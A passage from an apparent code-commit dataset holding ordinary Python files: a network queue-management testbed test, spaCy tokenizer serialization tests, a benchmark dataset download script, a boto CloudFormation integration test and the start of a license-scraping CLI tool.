branch_repeat(3),
#step_skipif(lambda testenv: True),
my_test,
)
)
if __name__ == '__main__':
require_on_aqm_node()
test_simple()
|
Add test for demonstrating new test utilities#!/usr/bin/env python3
from framework.test_framework import Testbed, TestEnv, require_on_aqm_node
from framework.test_utils import *
def test_simple():
def my_test(testcase):
testcase.run_greedy(node='a', tag='node-a')
testcase.run_greedy(node='b', tag='node-b')
testbed = Testbed()
testbed.ta_samples = 10
testbed.ta_idle = 2
testbed.ta_delay = 500
testbed.cc('a', 'cubic', testbed.ECN_ALLOW)
testbed.cc('b', 'dctcp-drop', testbed.ECN_INITIATE)
run_test(
folder='results/simple',
title='Just a simple test to verify setup',
testenv=TestEnv(testbed),
steps=(
branch_sched([
('pi2',
'PI2: dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t\\\\_shift 30ms l\\\\_drop 100',
lambda testbed: testbed.aqm_pi2(params='dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t_shift 30ms l_drop 100')),
('pie', 'PIE', lambda testbed: testbed.aqm_pie('ecn target 15ms tupdate 15ms alpha 1 beta 10 ecndrop 25')),
#('pfifo', 'pfifo', lambda testbed: testbed.aqm_pfifo()),
]),
branch_rtt([10, 50, 100], title='%d'),
plot_swap(),
branch_runif([
('iftest-1', lambda testenv: True, 'if test 1'),
('iftest-2', lambda testenv: True, 'if test 2'),
]),
plot_swap(),
branch_bitrate([100]),
plot_swap(-2),
plot_swap(-1),
branch_repeat(3),
#step_skipif(lambda testenv: True),
my_test,
)
)
if __name__ == '__main__':
require_on_aqm_node()
test_simple()
|
<commit_before><commit_msg>Add test for demonstrating new test utilities<commit_after>#!/usr/bin/env python3
from framework.test_framework import Testbed, TestEnv, require_on_aqm_node
from framework.test_utils import *
def test_simple():
def my_test(testcase):
testcase.run_greedy(node='a', tag='node-a')
testcase.run_greedy(node='b', tag='node-b')
testbed = Testbed()
testbed.ta_samples = 10
testbed.ta_idle = 2
testbed.ta_delay = 500
testbed.cc('a', 'cubic', testbed.ECN_ALLOW)
testbed.cc('b', 'dctcp-drop', testbed.ECN_INITIATE)
run_test(
folder='results/simple',
title='Just a simple test to verify setup',
testenv=TestEnv(testbed),
steps=(
branch_sched([
('pi2',
'PI2: dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t\\\\_shift 30ms l\\\\_drop 100',
lambda testbed: testbed.aqm_pi2(params='dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t_shift 30ms l_drop 100')),
('pie', 'PIE', lambda testbed: testbed.aqm_pie('ecn target 15ms tupdate 15ms alpha 1 beta 10 ecndrop 25')),
#('pfifo', 'pfifo', lambda testbed: testbed.aqm_pfifo()),
]),
branch_rtt([10, 50, 100], title='%d'),
plot_swap(),
branch_runif([
('iftest-1', lambda testenv: True, 'if test 1'),
('iftest-2', lambda testenv: True, 'if test 2'),
]),
plot_swap(),
branch_bitrate([100]),
plot_swap(-2),
plot_swap(-1),
branch_repeat(3),
#step_skipif(lambda testenv: True),
my_test,
)
)
if __name__ == '__main__':
require_on_aqm_node()
test_simple()
|
|
de974f7bef19dbddc046f07bb2a58b8afa3dba09
|
spacy/tests/serialize/test_serialize_tokenizer.py
|
spacy/tests/serialize/test_serialize_tokenizer.py
|
# coding: utf-8
from __future__ import unicode_literals
from ..util import make_tempdir
import pytest
@pytest.mark.parametrize('text', ["I can't do this"])
def test_serialize_tokenizer_roundtrip_bytes(en_tokenizer, text):
tokenizer_b = en_tokenizer.to_bytes()
new_tokenizer = en_tokenizer.from_bytes(tokenizer_b)
assert new_tokenizer.to_bytes() == tokenizer_b
doc1 = en_tokenizer(text)
doc2 = new_tokenizer(text)
assert [token.text for token in doc1] == [token.text for token in doc2]
def test_serialize_tokenizer_roundtrip_disk(en_tokenizer):
tokenizer = en_tokenizer
with make_tempdir() as d:
file_path = d / 'tokenizer'
tokenizer.to_disk(file_path)
tokenizer_d = en_tokenizer.from_disk(file_path)
assert tokenizer.to_bytes() == tokenizer_d.to_bytes()
|
Add serializer tests for tokenizer
|
Add serializer tests for tokenizer
|
Python
|
mit
|
recognai/spaCy,recognai/spaCy,spacy-io/spaCy,recognai/spaCy,aikramer2/spaCy,recognai/spaCy,explosion/spaCy,honnibal/spaCy,spacy-io/spaCy,honnibal/spaCy,spacy-io/spaCy,recognai/spaCy,explosion/spaCy,explosion/spaCy,explosion/spaCy,spacy-io/spaCy,explosion/spaCy,aikramer2/spaCy,explosion/spaCy,honnibal/spaCy,spacy-io/spaCy,spacy-io/spaCy,aikramer2/spaCy,recognai/spaCy,honnibal/spaCy,aikramer2/spaCy,aikramer2/spaCy,aikramer2/spaCy
|
Add serializer tests for tokenizer
|
# coding: utf-8
from __future__ import unicode_literals
from ..util import make_tempdir
import pytest
@pytest.mark.parametrize('text', ["I can't do this"])
def test_serialize_tokenizer_roundtrip_bytes(en_tokenizer, text):
tokenizer_b = en_tokenizer.to_bytes()
new_tokenizer = en_tokenizer.from_bytes(tokenizer_b)
assert new_tokenizer.to_bytes() == tokenizer_b
doc1 = en_tokenizer(text)
doc2 = new_tokenizer(text)
assert [token.text for token in doc1] == [token.text for token in doc2]
def test_serialize_tokenizer_roundtrip_disk(en_tokenizer):
tokenizer = en_tokenizer
with make_tempdir() as d:
file_path = d / 'tokenizer'
tokenizer.to_disk(file_path)
tokenizer_d = en_tokenizer.from_disk(file_path)
assert tokenizer.to_bytes() == tokenizer_d.to_bytes()
|
<commit_before><commit_msg>Add serializer tests for tokenizer<commit_after>
|
# coding: utf-8
from __future__ import unicode_literals
from ..util import make_tempdir
import pytest
@pytest.mark.parametrize('text', ["I can't do this"])
def test_serialize_tokenizer_roundtrip_bytes(en_tokenizer, text):
tokenizer_b = en_tokenizer.to_bytes()
new_tokenizer = en_tokenizer.from_bytes(tokenizer_b)
assert new_tokenizer.to_bytes() == tokenizer_b
doc1 = en_tokenizer(text)
doc2 = new_tokenizer(text)
assert [token.text for token in doc1] == [token.text for token in doc2]
def test_serialize_tokenizer_roundtrip_disk(en_tokenizer):
tokenizer = en_tokenizer
with make_tempdir() as d:
file_path = d / 'tokenizer'
tokenizer.to_disk(file_path)
tokenizer_d = en_tokenizer.from_disk(file_path)
assert tokenizer.to_bytes() == tokenizer_d.to_bytes()
|
Add serializer tests for tokenizer# coding: utf-8
from __future__ import unicode_literals
from ..util import make_tempdir
import pytest
@pytest.mark.parametrize('text', ["I can't do this"])
def test_serialize_tokenizer_roundtrip_bytes(en_tokenizer, text):
tokenizer_b = en_tokenizer.to_bytes()
new_tokenizer = en_tokenizer.from_bytes(tokenizer_b)
assert new_tokenizer.to_bytes() == tokenizer_b
doc1 = en_tokenizer(text)
doc2 = new_tokenizer(text)
assert [token.text for token in doc1] == [token.text for token in doc2]
def test_serialize_tokenizer_roundtrip_disk(en_tokenizer):
tokenizer = en_tokenizer
with make_tempdir() as d:
file_path = d / 'tokenizer'
tokenizer.to_disk(file_path)
tokenizer_d = en_tokenizer.from_disk(file_path)
assert tokenizer.to_bytes() == tokenizer_d.to_bytes()
|
<commit_before><commit_msg>Add serializer tests for tokenizer<commit_after># coding: utf-8
from __future__ import unicode_literals
from ..util import make_tempdir
import pytest
@pytest.mark.parametrize('text', ["I can't do this"])
def test_serialize_tokenizer_roundtrip_bytes(en_tokenizer, text):
tokenizer_b = en_tokenizer.to_bytes()
new_tokenizer = en_tokenizer.from_bytes(tokenizer_b)
assert new_tokenizer.to_bytes() == tokenizer_b
doc1 = en_tokenizer(text)
doc2 = new_tokenizer(text)
assert [token.text for token in doc1] == [token.text for token in doc2]
def test_serialize_tokenizer_roundtrip_disk(en_tokenizer):
tokenizer = en_tokenizer
with make_tempdir() as d:
file_path = d / 'tokenizer'
tokenizer.to_disk(file_path)
tokenizer_d = en_tokenizer.from_disk(file_path)
assert tokenizer.to_bytes() == tokenizer_d.to_bytes()
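The disk round-trip test leans on make_tempdir from the shared test utilities. Roughly, it is a context manager that yields a temporary directory as a Path and deletes it on exit; the sketch below is an assumed reconstruction for orientation, not the actual helper:

import shutil
import tempfile
from contextlib import contextmanager
from pathlib import Path

@contextmanager
def make_tempdir():
    # Hand the test a throwaway directory, then clean it up afterwards.
    d = Path(tempfile.mkdtemp())
    try:
        yield d
    finally:
        shutil.rmtree(str(d))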
|
|
99aadd5f7cc486f59c4f92f4987f0261c21590ce
|
download_data.py
|
download_data.py
|
from __future__ import print_function
import os
print('Making sure that you have the necessary Python libraries installed...\n')
try:
import wget
except:
try:
import pip
except:
os.system('easy_install pip')
os.system('pip install wget')
print('')
import wget
print('Downloading the data sets...')
if not os.path.isdir('data'):
os.mkdir('data')
dataset_list = ['20newsgroups.csv.gz',
'GAMETES-easy-4x2-way_her-0.4_pop-1600_attribs-100_discrete.csv.gz',
'GAMETES-hard-4x2-way_her-0.1_pop-200_attribs-100_discrete.csv.gz',
'Hill_Valley_with_noise.csv.gz',
'Hill_Valley_without_noise.csv.gz',
'breast-cancer-wisconsin.csv.gz',
'car-evaluation.csv.gz',
'cifar-10.csv.gz',
'cifar-100-coarse.csv.gz',
'cifar-100-fine.csv.gz',
'ecoli.csv.gz',
'flags.csv.gz',
'glass.csv.gz',
'ionosphere.csv.gz',
'mnist.csv.gz',
'sat.csv.gz',
'spambase.csv.gz',
'svhn.csv.gz',
'wine-quality-red.csv.gz',
'wine-quality-white.csv.gz',
'wine-recognition.csv.gz',
'yeast.csv.gz']
try:
for dataset in dataset_list:
if not os.path.exists('data/{}'.format(dataset)):
url = 'http://www.randalolson.com/data/{}'.format(dataset)
print('\n\n' + url)
wget.download(url, out='data/')
print('')
except KeyboardInterrupt:
os.system('rm *.csv.gz*.tmp')
print('')
|
Remove data files, add download script
|
Remove data files, add download script
This directory will become incredibly bloated if we add all of the data
here. Furthermore, it is not possible to upload large data sets into
GitHub repos. Thus, we will instead provide a script to download all of
the data sets from an external server.
|
Python
|
mit
|
rhiever/sklearn-benchmarks
|
Remove data files, add download script
This directory will become incredibly bloated if we add all of the data
here. Furthermore, it is not possible to upload large data sets into
GitHub repos. Thus, we will instead provide a script to download all of
the data sets from an external server.
|
from __future__ import print_function
import os
print('Making sure that you have the necessary Python libraries installed...\n')
try:
import wget
except:
try:
import pip
except:
os.system('easy_install pip')
os.system('pip install wget')
print('')
import wget
print('Downloading the data sets...')
if not os.path.isdir('data'):
os.mkdir('data')
dataset_list = ['20newsgroups.csv.gz',
'GAMETES-easy-4x2-way_her-0.4_pop-1600_attribs-100_discrete.csv.gz',
'GAMETES-hard-4x2-way_her-0.1_pop-200_attribs-100_discrete.csv.gz',
'Hill_Valley_with_noise.csv.gz',
'Hill_Valley_without_noise.csv.gz',
'breast-cancer-wisconsin.csv.gz',
'car-evaluation.csv.gz',
'cifar-10.csv.gz',
'cifar-100-coarse.csv.gz',
'cifar-100-fine.csv.gz',
'ecoli.csv.gz',
'flags.csv.gz',
'glass.csv.gz',
'ionosphere.csv.gz',
'mnist.csv.gz',
'sat.csv.gz',
'spambase.csv.gz',
'svhn.csv.gz',
'wine-quality-red.csv.gz',
'wine-quality-white.csv.gz',
'wine-recognition.csv.gz',
'yeast.csv.gz']
try:
for dataset in dataset_list:
if not os.path.exists('data/{}'.format(dataset)):
url = 'http://www.randalolson.com/data/{}'.format(dataset)
print('\n\n' + url)
wget.download(url, out='data/')
print('')
except KeyboardInterrupt:
os.system('rm *.csv.gz*.tmp')
print('')
|
<commit_before><commit_msg>Remove data files, add download script
This directory will become incredibly bloated if we add all of the data
here. Furthermore, it is not possible to upload large data sets into
GitHub repos. Thus, we will instead provide a script to download all of
the data sets from an external server.<commit_after>
|
from __future__ import print_function
import os
print('Making sure that you have the necessary Python libraries installed...\n')
try:
import wget
except:
try:
import pip
except:
os.system('easy_install pip')
os.system('pip install wget')
print('')
import wget
print('Downloading the data sets...')
if not os.path.isdir('data'):
os.mkdir('data')
dataset_list = ['20newsgroups.csv.gz',
'GAMETES-easy-4x2-way_her-0.4_pop-1600_attribs-100_discrete.csv.gz',
'GAMETES-hard-4x2-way_her-0.1_pop-200_attribs-100_discrete.csv.gz',
'Hill_Valley_with_noise.csv.gz',
'Hill_Valley_without_noise.csv.gz',
'breast-cancer-wisconsin.csv.gz',
'car-evaluation.csv.gz',
'cifar-10.csv.gz',
'cifar-100-coarse.csv.gz',
'cifar-100-fine.csv.gz',
'ecoli.csv.gz',
'flags.csv.gz',
'glass.csv.gz',
'ionosphere.csv.gz',
'mnist.csv.gz',
'sat.csv.gz',
'spambase.csv.gz',
'svhn.csv.gz',
'wine-quality-red.csv.gz',
'wine-quality-white.csv.gz',
'wine-recognition.csv.gz',
'yeast.csv.gz']
try:
for dataset in dataset_list:
if not os.path.exists('data/{}'.format(dataset)):
url = 'http://www.randalolson.com/data/{}'.format(dataset)
print('\n\n' + url)
wget.download(url, out='data/')
print('')
except KeyboardInterrupt:
os.system('rm *.csv.gz*.tmp')
print('')
|
Remove data files, add download script
This directory will become incredibly bloated if we add all of the data
here. Furthermore, it is not possible to upload large data sets into
GitHub repos. Thus, we will instead provide a script to download all of
the data sets from an external server.from __future__ import print_function
import os
print('Making sure that you have the necessary Python libraries installed...\n')
try:
import wget
except:
try:
import pip
except:
os.system('easy_install pip')
os.system('pip install wget')
print('')
import wget
print('Downloading the data sets...')
if not os.path.isdir('data'):
os.mkdir('data')
dataset_list = ['20newsgroups.csv.gz',
'GAMETES-easy-4x2-way_her-0.4_pop-1600_attribs-100_discrete.csv.gz',
'GAMETES-hard-4x2-way_her-0.1_pop-200_attribs-100_discrete.csv.gz',
'Hill_Valley_with_noise.csv.gz',
'Hill_Valley_without_noise.csv.gz',
'breast-cancer-wisconsin.csv.gz',
'car-evaluation.csv.gz',
'cifar-10.csv.gz',
'cifar-100-coarse.csv.gz',
'cifar-100-fine.csv.gz',
'ecoli.csv.gz',
'flags.csv.gz',
'glass.csv.gz',
'ionosphere.csv.gz',
'mnist.csv.gz',
'sat.csv.gz',
'spambase.csv.gz',
'svhn.csv.gz',
'wine-quality-red.csv.gz',
'wine-quality-white.csv.gz',
'wine-recognition.csv.gz',
'yeast.csv.gz']
try:
for dataset in dataset_list:
if not os.path.exists('data/{}'.format(dataset)):
url = 'http://www.randalolson.com/data/{}'.format(dataset)
print('\n\n' + url)
wget.download(url, out='data/')
print('')
except KeyboardInterrupt:
os.system('rm *.csv.gz*.tmp')
print('')
|
<commit_before><commit_msg>Remove data files, add download script
This directory will become incredibly bloated if we add all of the data
here. Furthermore, it is not possible to upload large data sets into
GitHub repos. Thus, we will instead provide a script to download all of
the data sets from an external server.<commit_after>from __future__ import print_function
import os
print('Making sure that you have the necessary Python libraries installed...\n')
try:
import wget
except:
try:
import pip
except:
os.system('easy_install pip')
os.system('pip install wget')
print('')
import wget
print('Downloading the data sets...')
if not os.path.isdir('data'):
os.mkdir('data')
dataset_list = ['20newsgroups.csv.gz',
'GAMETES-easy-4x2-way_her-0.4_pop-1600_attribs-100_discrete.csv.gz',
'GAMETES-hard-4x2-way_her-0.1_pop-200_attribs-100_discrete.csv.gz',
'Hill_Valley_with_noise.csv.gz',
'Hill_Valley_without_noise.csv.gz',
'breast-cancer-wisconsin.csv.gz',
'car-evaluation.csv.gz',
'cifar-10.csv.gz',
'cifar-100-coarse.csv.gz',
'cifar-100-fine.csv.gz',
'ecoli.csv.gz',
'flags.csv.gz',
'glass.csv.gz',
'ionosphere.csv.gz',
'mnist.csv.gz',
'sat.csv.gz',
'spambase.csv.gz',
'svhn.csv.gz',
'wine-quality-red.csv.gz',
'wine-quality-white.csv.gz',
'wine-recognition.csv.gz',
'yeast.csv.gz']
try:
for dataset in dataset_list:
if not os.path.exists('data/{}'.format(dataset)):
url = 'http://www.randalolson.com/data/{}'.format(dataset)
print('\n\n' + url)
wget.download(url, out='data/')
print('')
except KeyboardInterrupt:
os.system('rm *.csv.gz*.tmp')
print('')
|
|
50586ffe08473e5c7dc11b51f9b20923900e4f1c
|
tests/integration/cloudformation/test_connection.py
|
tests/integration/cloudformation/test_connection.py
|
#!/usr/bin/env python
import time
import json
from tests.unit import unittest
from boto.cloudformation.connection import CloudFormationConnection
BASIC_EC2_TEMPLATE = {
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "AWS CloudFormation Sample Template EC2InstanceSample",
"Parameters": {
},
"Mappings": {
"RegionMap": {
"us-east-1": {
"AMI": "ami-7f418316"
}
}
},
"Resources": {
"Ec2Instance": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId": {
"Fn::FindInMap": [
"RegionMap",
{
"Ref": "AWS::Region"
},
"AMI"
]
},
"UserData": {
"Fn::Base64": "a" * 15000
}
}
}
},
"Outputs": {
"InstanceId": {
"Description": "InstanceId of the newly created EC2 instance",
"Value": {
"Ref": "Ec2Instance"
}
},
"AZ": {
"Description": "Availability Zone of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"AvailabilityZone"
]
}
},
"PublicIP": {
"Description": "Public IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicIp"
]
}
},
"PrivateIP": {
"Description": "Private IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateIp"
]
}
},
"PublicDNS": {
"Description": "Public DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicDnsName"
]
}
},
"PrivateDNS": {
"Description": "Private DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateDnsName"
]
}
}
}
}
class TestCloudformationConnection(unittest.TestCase):
def setUp(self):
self.connection = CloudFormationConnection()
self.stack_name = 'testcfnstack' + str(int(time.time()))
def test_large_template_stack_size(self):
# See https://github.com/boto/boto/issues/1037
body = self.connection.create_stack(
self.stack_name,
template_body=json.dumps(BASIC_EC2_TEMPLATE))
self.addCleanup(self.connection.delete_stack, self.stack_name)
if __name__ == '__main__':
unittest.main()
|
Add failing integration test for sigv4 failure
|
Add failing integration test for sigv4 failure
This repros #1037.
|
Python
|
mit
|
jotes/boto,revmischa/boto,trademob/boto,shaunbrady/boto,awatts/boto,darjus-amzn/boto,alex/boto,jindongh/boto,zzzirk/boto,jameslegg/boto,campenberger/boto,nexusz99/boto,acourtney2015/boto,garnaat/boto,s0enke/boto,lra/boto,ocadotechnology/boto,pfhayes/boto,nikhilraog/boto,clouddocx/boto,ryansb/boto,ekalosak/boto,vijaylbais/boto,israelbenatar/boto,kouk/boto,disruptek/boto,tpodowd/boto,kouk/boto,FATruden/boto,ddzialak/boto,Asana/boto,dablak/boto,lochiiconnectivity/boto,weka-io/boto,nishigori/boto,dablak/boto,rjschwei/boto,khagler/boto,Timus1712/boto,stevenbrichards/boto,vishnugonela/boto,bleib1dj/boto,varunarya10/boto,alex/boto,ric03uec/boto,alfredodeza/boto,drbild/boto,SaranyaKarthikeyan/boto,cyclecomputing/boto,rjschwei/boto,ramitsurana/boto,appneta/boto,shipci/boto,appneta/boto,jamesls/boto,rayluo/boto,podhmo/boto,andresriancho/boto,serviceagility/boto,felix-d/boto,drbild/boto,dimdung/boto,Pretio/boto,lochiiconnectivity/boto,rosmo/boto,bryx-inc/boto,janslow/boto,zachmullen/boto,weebygames/boto,jamesls/boto,abridgett/boto,tpodowd/boto,TiVoMaker/boto,jameslegg/boto,j-carl/boto,disruptek/boto,elainexmas/boto,andresriancho/boto,yangchaogit/boto
|
Add failing integration test for sigv4 failure
This repros #1037.
|
#!/usr/bin/env python
import time
import json
from tests.unit import unittest
from boto.cloudformation.connection import CloudFormationConnection
BASIC_EC2_TEMPLATE = {
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "AWS CloudFormation Sample Template EC2InstanceSample",
"Parameters": {
},
"Mappings": {
"RegionMap": {
"us-east-1": {
"AMI": "ami-7f418316"
}
}
},
"Resources": {
"Ec2Instance": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId": {
"Fn::FindInMap": [
"RegionMap",
{
"Ref": "AWS::Region"
},
"AMI"
]
},
"UserData": {
"Fn::Base64": "a" * 15000
}
}
}
},
"Outputs": {
"InstanceId": {
"Description": "InstanceId of the newly created EC2 instance",
"Value": {
"Ref": "Ec2Instance"
}
},
"AZ": {
"Description": "Availability Zone of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"AvailabilityZone"
]
}
},
"PublicIP": {
"Description": "Public IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicIp"
]
}
},
"PrivateIP": {
"Description": "Private IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateIp"
]
}
},
"PublicDNS": {
"Description": "Public DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicDnsName"
]
}
},
"PrivateDNS": {
"Description": "Private DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateDnsName"
]
}
}
}
}
class TestCloudformationConnection(unittest.TestCase):
def setUp(self):
self.connection = CloudFormationConnection()
self.stack_name = 'testcfnstack' + str(int(time.time()))
def test_large_template_stack_size(self):
# See https://github.com/boto/boto/issues/1037
body = self.connection.create_stack(
self.stack_name,
template_body=json.dumps(BASIC_EC2_TEMPLATE))
self.addCleanup(self.connection.delete_stack, self.stack_name)
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add failing integration test for sigv4 failure
This repros #1037.<commit_after>
|
#!/usr/bin/env python
import time
import json
from tests.unit import unittest
from boto.cloudformation.connection import CloudFormationConnection
BASIC_EC2_TEMPLATE = {
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "AWS CloudFormation Sample Template EC2InstanceSample",
"Parameters": {
},
"Mappings": {
"RegionMap": {
"us-east-1": {
"AMI": "ami-7f418316"
}
}
},
"Resources": {
"Ec2Instance": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId": {
"Fn::FindInMap": [
"RegionMap",
{
"Ref": "AWS::Region"
},
"AMI"
]
},
"UserData": {
"Fn::Base64": "a" * 15000
}
}
}
},
"Outputs": {
"InstanceId": {
"Description": "InstanceId of the newly created EC2 instance",
"Value": {
"Ref": "Ec2Instance"
}
},
"AZ": {
"Description": "Availability Zone of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"AvailabilityZone"
]
}
},
"PublicIP": {
"Description": "Public IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicIp"
]
}
},
"PrivateIP": {
"Description": "Private IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateIp"
]
}
},
"PublicDNS": {
"Description": "Public DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicDnsName"
]
}
},
"PrivateDNS": {
"Description": "Private DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateDnsName"
]
}
}
}
}
class TestCloudformationConnection(unittest.TestCase):
def setUp(self):
self.connection = CloudFormationConnection()
self.stack_name = 'testcfnstack' + str(int(time.time()))
def test_large_template_stack_size(self):
# See https://github.com/boto/boto/issues/1037
body = self.connection.create_stack(
self.stack_name,
template_body=json.dumps(BASIC_EC2_TEMPLATE))
self.addCleanup(self.connection.delete_stack, self.stack_name)
if __name__ == '__main__':
unittest.main()
|
Add failing integration test for sigv4 failure
This repros #1037.#!/usr/bin/env python
import time
import json
from tests.unit import unittest
from boto.cloudformation.connection import CloudFormationConnection
BASIC_EC2_TEMPLATE = {
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "AWS CloudFormation Sample Template EC2InstanceSample",
"Parameters": {
},
"Mappings": {
"RegionMap": {
"us-east-1": {
"AMI": "ami-7f418316"
}
}
},
"Resources": {
"Ec2Instance": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId": {
"Fn::FindInMap": [
"RegionMap",
{
"Ref": "AWS::Region"
},
"AMI"
]
},
"UserData": {
"Fn::Base64": "a" * 15000
}
}
}
},
"Outputs": {
"InstanceId": {
"Description": "InstanceId of the newly created EC2 instance",
"Value": {
"Ref": "Ec2Instance"
}
},
"AZ": {
"Description": "Availability Zone of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"AvailabilityZone"
]
}
},
"PublicIP": {
"Description": "Public IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicIp"
]
}
},
"PrivateIP": {
"Description": "Private IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateIp"
]
}
},
"PublicDNS": {
"Description": "Public DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicDnsName"
]
}
},
"PrivateDNS": {
"Description": "Private DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateDnsName"
]
}
}
}
}
class TestCloudformationConnection(unittest.TestCase):
def setUp(self):
self.connection = CloudFormationConnection()
self.stack_name = 'testcfnstack' + str(int(time.time()))
def test_large_template_stack_size(self):
# See https://github.com/boto/boto/issues/1037
body = self.connection.create_stack(
self.stack_name,
template_body=json.dumps(BASIC_EC2_TEMPLATE))
self.addCleanup(self.connection.delete_stack, self.stack_name)
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add failing integration test for sigv4 failure
This repros #1037.<commit_after>#!/usr/bin/env python
import time
import json
from tests.unit import unittest
from boto.cloudformation.connection import CloudFormationConnection
BASIC_EC2_TEMPLATE = {
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "AWS CloudFormation Sample Template EC2InstanceSample",
"Parameters": {
},
"Mappings": {
"RegionMap": {
"us-east-1": {
"AMI": "ami-7f418316"
}
}
},
"Resources": {
"Ec2Instance": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId": {
"Fn::FindInMap": [
"RegionMap",
{
"Ref": "AWS::Region"
},
"AMI"
]
},
"UserData": {
"Fn::Base64": "a" * 15000
}
}
}
},
"Outputs": {
"InstanceId": {
"Description": "InstanceId of the newly created EC2 instance",
"Value": {
"Ref": "Ec2Instance"
}
},
"AZ": {
"Description": "Availability Zone of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"AvailabilityZone"
]
}
},
"PublicIP": {
"Description": "Public IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicIp"
]
}
},
"PrivateIP": {
"Description": "Private IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateIp"
]
}
},
"PublicDNS": {
"Description": "Public DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicDnsName"
]
}
},
"PrivateDNS": {
"Description": "Private DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateDnsName"
]
}
}
}
}
class TestCloudformationConnection(unittest.TestCase):
def setUp(self):
self.connection = CloudFormationConnection()
self.stack_name = 'testcfnstack' + str(int(time.time()))
def test_large_template_stack_size(self):
# See https://github.com/boto/boto/issues/1037
body = self.connection.create_stack(
self.stack_name,
template_body=json.dumps(BASIC_EC2_TEMPLATE))
self.addCleanup(self.connection.delete_stack, self.stack_name)
if __name__ == '__main__':
unittest.main()
|
|
219133a80fe4f772f64846b985e891b9536c35ea
|
crawler.py
|
crawler.py
|
import sys
import click
import requests
from bs4 import BeautifulSoup
from crayons import green, red
from notary import LICENSE_DIR
BASE_URL = "https://choosealicense.com"
LICENSES_URL = "{0}/licenses/".format(BASE_URL)
class License(object):
def __init__(self, url, slug, name, content):
self.url = url
self.slug = slug
self.name = name
self.content = content
self.path = LICENSE_DIR.joinpath("{0}.md".format(self.slug))
def __repr__(self):
return "<License slug: {0}, name: {1}".format(self.slug, self.name)
def open(self, *args, **kwargs):
return self.path.open('w')
@click.group()
def cli():
"""Fetch licenses from https://choosealicense.com/."""
@cli.command('run', short_help="scrape {0} licenses".format(BASE_URL))
def run():
"""
Crawls https://choosealicense.com/licenses and fetches all open source license urls.
It then crawls each individual license page and stores it in the {LICENSE_DIR}
folder, under {slug}.md.
"""
response = requests.get(LICENSES_URL)
if response.status_code != 200:
click.echo(
"URL {0} returned status {1}".
format(green(LICENSES_URL), red(response.status_code))
)
sys.exit(1)
soup = BeautifulSoup(response.content, 'html.parser')
url_tuples = [
(BASE_URL, license_overview.div.h3.a.get('href'))
for license_overview in soup.find_all('div', {'class': 'license-overview'})
]
with click.progressbar(
iterable=url_tuples, show_pos=True, label="Fetching licenses"
) as urls:
for url_tuple in urls:
click.echo()
url = ''.join(url_tuple)
response = requests.get(url)
license_soup = BeautifulSoup(response.content, 'html.parser')
try:
lic = License(
url,
url_tuple[1].split('/')[2],
license_soup.h1.string,
license_soup.find(id='license-text').string
)
with lic.open('w') as f:
f.write(lic.content)
click.echo("Finished crawling {0}.".format(green(url)))
except AttributeError:
click.echo("Could not fetch license from {0}".format(green(url)))
if __name__ == '__main__':
cli()
|
Add CLI tool that crawls choosealicense for OSS licenses.
|
Add CLI tool that crawls choosealicense for OSS licenses.
|
Python
|
mit
|
sxn/notary
|
Add CLI tool that crawls choosealicense for OSS licenses.
|
import sys
import click
import requests
from bs4 import BeautifulSoup
from crayons import green, red
from notary import LICENSE_DIR
BASE_URL = "https://choosealicense.com"
LICENSES_URL = "{0}/licenses/".format(BASE_URL)
class License(object):
def __init__(self, url, slug, name, content):
self.url = url
self.slug = slug
self.name = name
self.content = content
self.path = LICENSE_DIR.joinpath("{0}.md".format(self.slug))
def __repr__(self):
